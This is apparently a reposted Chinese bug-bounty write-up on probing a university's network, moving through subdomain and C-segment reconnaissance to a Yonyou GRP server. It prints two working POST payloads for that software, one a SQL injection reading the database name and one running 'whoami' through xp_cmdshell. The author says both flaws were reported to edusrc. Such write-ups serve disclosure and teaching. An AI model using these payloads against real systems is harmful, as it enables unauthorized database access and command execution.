简单的挖掘edu

admin 2025年1月13日19:36:57评论8 views字数 1548阅读5分9秒阅读模式

0x01 前言

闲来没事,突然想到能不能挖一手edu的漏洞,打开edusrc高校排行榜随机抽取了一位幸运儿,然后开始对此开始测试。

0x02 信息搜集

第一步肯定是信息收集,比较懒直接就收集子域名,什么whois,资产,CDN管都不管,开启oneforall就是开干。

简单的挖掘edu

兴高采烈地的打开扫完的文档,怎么就这几个站点,这下难住了

简单的挖掘edu

一个一个网站测试过去,都没有很好的结果,都是一些危害较低的。仔细想想,又回来信息收集,收集一手c段。

简单的挖掘edu

完美成功的拿下了c段,现在就是测试有没有c段的网站了,利用fofa语法搜索

ip="X.X.X.0/24" && status_code="200"
简单的挖掘edu

一个一个的网段测试下来,终于找到一个脆弱的站点了,打开一看是用友的GRP

简单的挖掘edu

百度搜索一下有没有可以利用的漏洞,发现还是有很多的漏洞的

简单的挖掘edu

0x03 漏洞验证与利用

开始检测漏洞,经过验证发现存在SQL注入和RCE,美滋滋又是一个高危。通过hackbar POST方式提交

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><r9packet version="1"><dataformat>XML</dataformat><r9function><name>AS_DataRequest</name><params><param><name>ProviderName</name><data format="text">DataSetProviderData</data><param><name>Data</name><data format="text">select db_name() </data></params></r9function></r9packet>
然后burp抓包,发送到重放器中
简单的挖掘edu
nice,成功爆出数据库的名字,不过只是中危,接下来尝试能不能RCE。同样通过hackbar POST方式提交
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><r9packet version="1"><dataformat>XML</dataformat><r9function><name>AS_DataRequest</name><params><param><name>ProviderName</name><data format="text">DataSetProviderData</data><param><name>Data</name><data format="text">exec xp_cmdshell 'whoami'</data></params></r9function></r9packet>
然后burp抓包,发送到重放器中
简单的挖掘edu
成功执行,拿下一个高危!

0x04 结尾

漏洞当前已经上交edusrc,挖掘的没什么特别难的地方,漏洞也都是复现网上的,最主要的是信息收集,收集的地址越多,能够拿下高危的机会也就越大(大佬除外)。

文章来源:先知社区(满腔热血付于海)

原文地址:https://xz.aliyun.com/t/10310

网络¥安全联盟站

网络¥安全联盟站成立于2021年,高质量网络运维与安全攻防领域星球,致力于路由交换、云计算、存储、网络实战运维、web安全、APP安全、内网安全、红蓝安全攻防等资料分享,每日分享行业最新资讯和前沿学习资料,星球中已发布 700+网络运维和安全攻防等资源,针对网络和安全学习成员的普遍水平,并为星友提供了视频教程、工具、最新漏洞POC、EXP等等,循序渐进的方式引导广大网络从业者转型为安全技术人员,加深技术学习提高以及岗位内推等等。

简单的挖掘edu

原文始发于微信公众号(李白你好):简单的挖掘edu

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日19:36:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   简单的挖掘eduhttps://cn-sec.com/archives/1100067.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息